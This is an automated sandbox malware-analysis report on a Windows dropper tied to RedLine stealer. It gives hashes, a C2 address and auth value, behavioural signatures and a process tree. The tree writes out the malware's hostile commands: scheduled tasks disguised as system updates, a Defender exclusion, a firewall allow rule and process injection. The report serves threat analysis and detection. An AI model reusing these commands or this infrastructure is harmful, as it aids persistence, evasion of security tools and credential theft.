Resubmissions
- 11-02-2024 08:10  240211-j212ragb47  10
- 11-02-2024 08:09  240211-j2kprseb2w  10
- 09-02-2024 18:28  240209-w4c4xsde9t  10
- 02-02-2024 12:52  240202-p4dxwsgfej  10
- 02-02-2024 12:45  240202-pzapnsgdbp  10
- 16-01-2024 15:29  240116-sw8dbaehh3  10
- 10-01-2024 14:41  240110-r2wq2ahchl  10
- 10-01-2024 13:29  240110-qrqatshbg3  10
- 22-12-2023 08:48  231222-kqp1sadghq  10

Analysis
max time kernel: 933s
max time network: 1801s
platform: windows10-1703_x64
resource: win10-20231215-en
resource tags: arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
submitted: 10-01-2024 14:41
Static task: static1
Behavioral task behavioral1: sample 4363463463464363463463463.exe, resource win7-20231215-en
Behavioral task behavioral2: sample 4363463463464363463463463.exe, resource win10-20231215-en
Behavioral task behavioral3: sample 4363463463464363463463463.exe, resource win10v2004-20231215-en
Behavioral task behavioral4: sample 4363463463464363463463463.exe, resource win11-20231215-en
General
Target: 4363463463464363463463463.exe
Size: 10KB
MD5: 2a94f3960c58c6e70826495f76d00b85
SHA1: e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256: 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512: fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP: 192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
family: redline
botnet: kent
C2: 89.23.98.143:11627
auth_value: 24d164ebaf8f462b9dc88d186199283b
Signatures

DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.
Detect ZGRat V1 (1 IoC)
  resource: behavioral2/files/0x000600000001af35-7419.dat  yara_rule: family_zgrat_v1
Process spawned unexpected child process (24 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid_target: 816  Process: schtasks.exe  procid_target: 140
  pid (24 entries, report order): 2356, 6140, 2148, 4800, 1956, 5580, 4016, 5104, 1380, 6020, 6044, 6056, 5692, 1964, 2356, 6008, 3104, 5296, 3208, 5444, 5604, 5448, 5796, 2884
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description: PID 4304 created 96  pid: 4304  Process: svchost.exe  procid_target: 15
  description: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  Process: reg.exe

  resource: behavioral2/files/0x000600000001af16-7211.dat  yara_rule: dcrat
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  description: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  Process: brg.exe

Downloads MZ/PE file

Modifies Windows Firewall (1 TTPs, 2 IoCs)
  pid/Process: 824 netsh.exe, 4676 netsh.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Process: brg.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  Process: brg.exe
Drops startup file (4 IoCs)
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ephmm803xl4Xt4c0wIYM16Zs.bat  Process: jsc.exe
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iIVeYgr4qCwFFqneJCi6oflw.bat  Process: jsc.exe
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3yznG8ez4XFRVpTTGtT8TbfI.bat  Process: jsc.exe
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe  Process: Conhost.exe
Executes dropped EXE (20 IoCs)
  pid/Process: 5096 Temp2.exe, 4936 asg.exe, 4224 tuc5.exe, 168 tuc5.tmp, 2504 brg.exe, 1604 VLTKBacdau.exe, 400 tuc6.exe, 4500 tuc6.tmp, 2176 tuc2.exe, 2880 tuc2.tmp, 4304 svchost.exe, 2544 VCDDaemon.exe, 832 DefenderControl.exe, 3608 Conhost.exe, 200 WerFault.exe, 2400 qemu-ga.exe, 1516 reg.exe, 3640 south.exe, 2252 smell-the-roses.exe, 524 3Nh3iUB0ixXPS46jElx130zZ.exe
Loads dropped DLL (16 IoCs)
  pid/Process: 168 tuc5.tmp (x3), 4500 tuc6.tmp (x3), 2880 tuc2.tmp (x3), 2544 VCDDaemon.exe (x5), 2252 smell-the-roses.exe (x2)

Yara rule match: themida
  resource: behavioral2/files/0x000700000001ac3b-195.dat
  resource: behavioral2/files/0x000700000001ac3b-196.dat
  resource: behavioral2/memory/2504-209-0x0000000000CB0000-0x0000000001228000-memory.dmp
  resource: behavioral2/memory/2504-244-0x0000000000CB0000-0x0000000001228000-memory.dmp

Yara rule match: upx
  resource: behavioral2/files/0x000700000001acc7-6273.dat
Uses the VBS compiler for execution (1 TTPs)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks whether UAC is enabled
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Process: brg.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 18  ioc: ip-api.com
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoC)
Bootkits write to the MBR to gain persistence at a level below the operating system.
  File opened for modification \??\PhysicalDrive0  Process: VLTKBacdau.exe
Drops file in System32 directory (4 IoCs)
  File created C:\Windows\SysWOW64\SubDir\asg.exe  Process: Temp2.exe
  File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe  Process: Temp2.exe
  File opened for modification C:\Windows\SysWOW64\SubDir\asg.exe  Process: asg.exe
  File opened for modification C:\Windows\SysWOW64\SubDir  Process: asg.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  pid/Process: 2504 brg.exe

Suspicious use of SetThreadContext (4 IoCs)
  PID 2504 set thread context of 508  Process: brg.exe  procid_target: 85
  PID 2544 set thread context of 4368  Process: VCDDaemon.exe  procid_target: 93
  PID 4368 set thread context of 536  Process: cmd.exe  procid_target: 98
  PID 1516 set thread context of 1472  Process: reg.exe  procid_target: 110
Launches sc.exe (1 IoC)
Sc.exe is a Windows utility to control services on the system.
  pid/Process: 1108 sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (64 IoCs)
  WerFault.exe pids, grouped by crashed process (pid_target / procid_target), report order within each group:
  target 2924 / 121: 4436, 4404, 4132, 2264, 2352, 4976, 1320, 3996, 220, 1796, 2808, 424, 4284, 2384, 3652, 4700, 1272, 3480, 2324
  target 1936 / 145: 1352, 1744, 1880, 3376, 2020, 1952, 1172, 4716, 3692
  target 2232 / 159: 3024, 4668, 1384, 2336, 3368, 2748, 1172, 4040, 4160
  target 3620 / 176: 2244, 1296, 4976, 1012, 4792, 4436, 1748, 4896, 8, 4404, 1560
  target 2844 / 193: 1512, 4520, 4432, 1756, 740, 2376, 3004, 4568, 2500, 2284, 1904, 4788, 4388, 4528, 4040, 1296
NSIS installer (2 IoCs)
  resource: behavioral2/files/0x000600000001add9-4743.dat  yara_rule: nsis_installer_1
  resource: behavioral2/files/0x000600000001add9-4743.dat  yara_rule: nsis_installer_2
Creates scheduled task(s) (1 TTPs, 42 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  schtasks.exe pids: 4800, 5104, 1380, 4108, 4372, 4660, 5276, 6028, 5604, 3480, 5480, 2148, 2356, 4736, 4016, 5692, 3208, 5796, 1388, 1168, 5328, 3104, 5444, 3876, 2356, 6020, 6044, 5296, 6008, 4884, 3172, 2244, 6140, 6056, 1956, 1964, 5448, 1908, 4404, 5920, 5580, 2884
Delays execution with timeout.exe (2 IoCs)
  pid/Process: 2384 timeout.exe, 5136 timeout.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid/Process: 2504 brg.exe (x2), 4304 svchost.exe (x2), 2544 VCDDaemon.exe (x2), 4368 cmd.exe (x2), 3608 Conhost.exe, 4556 powershell.exe (x3)

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  pid/Process: 1604 VLTKBacdau.exe, 832 DefenderControl.exe

Suspicious behavior: MapViewOfSection (3 IoCs)
  pid/Process: 2544 VCDDaemon.exe, 4368 cmd.exe (x2)
Suspicious use of AdjustPrivilegeToken (31 IoCs)
  Token SeDebugPrivilege, pid/Process: 96 4363463463464363463463463.exe, 5096 Temp2.exe, 4936 asg.exe, 2504 brg.exe, 1604 VLTKBacdau.exe, 536 MSBuild.exe, 3608 Conhost.exe, 1516 reg.exe, 4556 powershell.exe (x2), 1472 jsc.exe
  Further tokens for 4556 powershell.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of FindShellTrayWindow (64 IoCs)
  pid/Process: 168 tuc5.tmp, 4500 tuc6.tmp, 2880 tuc2.tmp, 832 DefenderControl.exe (the remaining 61 entries)

Suspicious use of SendNotifyMessage (64 IoCs)
  pid/Process: 832 DefenderControl.exe (all 64 entries)
Suspicious use of SetWindowsHookEx (4 IoCs)
  pid/Process: 4936 asg.exe, 4304 svchost.exe (x2), 3640 south.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Each line gives writer PID (Process), target PID, procid_target and how many times the entry is repeated:
  PID 96 (4363463463464363463463463.exe) wrote to memory of 5096, procid_target 75 (x2)
  PID 5096 (Temp2.exe) wrote to memory of 4884, procid_target 79 (x2)
  PID 5096 (Temp2.exe) wrote to memory of 4936, procid_target 78 (x2)
  PID 4936 (asg.exe) wrote to memory of 3876, procid_target 81 (x2)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 4224, procid_target 82 (x3)
  PID 4224 (tuc5.exe) wrote to memory of 168, procid_target 83 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 2504, procid_target 84 (x3)
  PID 2504 (brg.exe) wrote to memory of 508, procid_target 85 (x8)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 1604, procid_target 86 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 400, procid_target 87 (x3)
  PID 400 (tuc6.exe) wrote to memory of 4500, procid_target 88 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 2176, procid_target 90 (x3)
  PID 2176 (tuc2.exe) wrote to memory of 2880, procid_target 89 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 4304, procid_target 91 (x3)
  PID 4304 (svchost.exe) wrote to memory of 2544, procid_target 94 (x3)
  PID 2544 (VCDDaemon.exe) wrote to memory of 4368, procid_target 93 (x4)
  PID 4368 (cmd.exe) wrote to memory of 536, procid_target 98 (x4)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 832, procid_target 100 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 3608, procid_target 453 (x3)
  PID 96 (4363463463464363463463463.exe) wrote to memory of 200, procid_target 512 (x2)
  PID 3608 (Conhost.exe) wrote to memory of 2400, procid_target 105 (x2)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Indentation shows parent/child depth; each entry lists image path, PID, command line and matched signatures.

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe  [PID 96]
  cmd: "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe  [PID 5096]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\SubDir\asg.exe  [PID 4936]
      cmd: "C:\Windows\SysWOW64\SubDir\asg.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Windows\SYSTEM32\schtasks.exe  [PID 3876]
        cmd: "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
        - Creates scheduled task(s)

    C:\Windows\SYSTEM32\schtasks.exe  [PID 4884]
      cmd: "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp2.exe" /rl HIGHEST /f
      - Creates scheduled task(s)

  C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe  [PID 4224]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp  [PID 168]
      cmd: "C:\Users\Admin\AppData\Local\Temp\is-1K0I5.tmp\tuc5.tmp" /SL5="$B0060,4472331,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of FindShellTrayWindow

  C:\Users\Admin\AppData\Local\Temp\Files\brg.exe  [PID 2504]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe  [PID 508]
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

    C:\Windows\system32\schtasks.exe  [PID 4372]
      cmd: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      - Creates scheduled task(s)
  C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe  [PID 1604]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe  [PID 400]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp  [PID 4500]
      cmd: "C:\Users\Admin\AppData\Local\Temp\is-KLKRL.tmp\tuc6.tmp" /SL5="$500CE,4469780,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of FindShellTrayWindow

  C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe  [PID 2176]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe  [PID 4304]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe  [PID 2544]
    cmd: C:\Users\Admin\AppData\Roaming\msdt\VCDDaemon.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe  [PID 832]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

  C:\Users\Admin\AppData\Local\Temp\Files\alex.exe  [PID 3608]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"

    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe  [PID 2400]
      cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
      - Executes dropped EXE

  C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe  [PID 200]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\CoercedPotato.exe"

  C:\Users\Admin\AppData\Local\Temp\Files\456.exe  [PID 1516]
    cmd: "C:\Users\Admin\AppData\Local\Temp\Files\456.exe"

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4556]
      cmd: "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\456.exe" -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  [PID 1472]
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      - Drops startup file
      - Suspicious use of AdjustPrivilegeToken

      C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe  [PID 524]
        cmd: "C:\Users\Admin\Pictures\3Nh3iUB0ixXPS46jElx130zZ.exe"
        - Executes dropped EXE

      C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe  [PID 3632]
        cmd: "C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe"

      C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe  [PID 2924]
        cmd: "C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"
        C:\Windows\SysWOW64\WerFault.exe  [PID 4436]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 392
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 4404]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 376
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 4132]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 408
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 2264]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 716
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 2352]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 732
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 4976]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 832
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 1320]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 732
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 3996]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 796
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 220]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 840
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 1796]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 608
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 2808]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 828
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 424]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 836
          - Program crash

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 1444]
          cmd: powershell -nologo -noprofile

        C:\Windows\SysWOW64\WerFault.exe  [PID 4284]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 832
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 2384]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 608
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 3652]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 564
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 4700]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 720
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 1272]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 676
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 3480]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 228
          - Program crash

        C:\Windows\SysWOW64\WerFault.exe  [PID 2324]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 648
          - Program crash

        C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe  [PID 2232]
          cmd: "C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"
          C:\Windows\SysWOW64\WerFault.exe  [PID 3024]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 328
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 4668]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 628
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 1384]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 708
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 2336]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 792
            - Program crash

          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 4728]
            cmd: powershell -nologo -noprofile

          C:\Windows\SysWOW64\WerFault.exe  [PID 3368]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 692
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 2748]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 664
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 1172]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 584
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 4040]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 396
            - Program crash

          C:\Windows\SysWOW64\WerFault.exe  [PID 4160]
            cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 348
            - Program crash

          C:\Windows\System32\cmd.exe  [PID 1840]
            cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 2336]
            cmd: powershell -nologo -noprofile

          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 3692]
            cmd: powershell -nologo -noprofile

          C:\Windows\rss\csrss.exe  [PID 2844]
            cmd: C:\Windows\rss\csrss.exe
            C:\Windows\SysWOW64\WerFault.exe  [PID 1512]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 392
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4520]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 472
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4432]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 636
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 1756]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 680
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 740]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 716
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 2376]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 612
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 3004]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 412
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4568]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 728
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 2500]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 384
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 2284]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 848
              - Program crash

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 4108]
              cmd: powershell -nologo -noprofile

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 1068]
              cmd: powershell -nologo -noprofile

            C:\Windows\SYSTEM32\schtasks.exe  [PID 2848]
              cmd: schtasks /delete /tn ScheduledUpdate /f

            C:\Windows\SYSTEM32\schtasks.exe  [PID 4736]
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 200]
              cmd: powershell -nologo -noprofile

            C:\Windows\SysWOW64\WerFault.exe  [PID 1904]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 880
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4788]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 876
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4388]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 868
              - Program crash

            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe  [PID 3368]
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

            C:\Windows\SysWOW64\WerFault.exe  [PID 4528]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 676
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 4040]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 988
              - Program crash

            C:\Windows\SYSTEM32\schtasks.exe  [PID 1908]
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)

            C:\Windows\windefender.exe  [PID 612]
              cmd: "C:\Windows\windefender.exe"

            C:\Windows\SysWOW64\WerFault.exe  [PID 1296]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1012
              - Program crash

            C:\Windows\SysWOW64\WerFault.exe  [PID 1880]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1028

            C:\Windows\SysWOW64\WerFault.exe  [PID 2784]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 728

            C:\Windows\SysWOW64\WerFault.exe  [PID 4424]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1112

            C:\Windows\SysWOW64\WerFault.exe  [PID 3456]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1124

            C:\Windows\SysWOW64\WerFault.exe  [PID 380]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1000

            C:\Windows\SysWOW64\WerFault.exe  [PID 4520]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1076

            C:\Windows\SysWOW64\WerFault.exe  [PID 3168]
              cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 1168

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [PID 4392]
              cmd: powershell -nologo -noprofile
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 9927⤵PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 9687⤵PID:5496
-
-
